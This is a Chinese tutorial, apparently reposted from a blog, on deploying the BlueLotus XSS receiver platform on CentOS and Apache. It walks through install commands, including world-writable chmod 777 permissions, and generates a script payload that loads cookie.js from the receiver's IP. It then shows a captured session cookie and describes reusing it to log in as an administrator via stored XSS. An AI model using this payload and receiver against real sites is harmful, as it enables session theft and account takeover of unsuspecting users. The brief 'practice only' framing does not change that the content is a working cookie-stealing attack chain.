一、前言
本平台是个人轻量级XSS测试平台,仅作为练习参考。
二、实验环境
服务器操作系统:Centos 6.6
Web容器:Apache
三、平台搭建过程
安装Apache
安装PHP
安装Git工具
从GitHub克隆XSS平台源码
删除默认网站内容
rm -rf /var/www/*
创建新的网站目录
mkdir /var/www/xss
从GitHub克隆xss测试源码(https://github.com/firesunCN/BlueLotus_XSSReceiver.git)
git clone https://github.com/firesunCN/BlueLotus_XSSReceiver.git /var/www/xss/
授权
chmod -R 777 /var/www/xss/
配置Apache
允许使用 .htaccess文件
在文件末尾加上
Include /etc/httpd/conf/vhost/httpd-vhosts.conf
开机启动Apache服务
chkconfig httpd on
重新加载Apache配置文件
service httpd reload
安装XSS平台
访问服务器ip地址,点击安装
主要修改后台登录密码和数据加密密码,其余保持默认,然后提交
安装成功,点击登录
成功登录
功能测试
点击我的JS,插入模板,选择Defualt.js,修改网站服务器ip地址
http://192.168.75.129/index.php
生成payload
<script src="http://192.168.75.129/myjs/cookie.js"></script>
成功获取用户cookie
ASPSESSIONIDCQBSTQBB=BHILNFDBLNPBDMOBFPHNOFBJ
利用Google浏览器插件edit this cookie修改cookie登录
到此存储型xss注入获取管理员cookie并登录已经圆满完成。
原文地址:https://www.cnblogs.com/panisme/p/8445071.html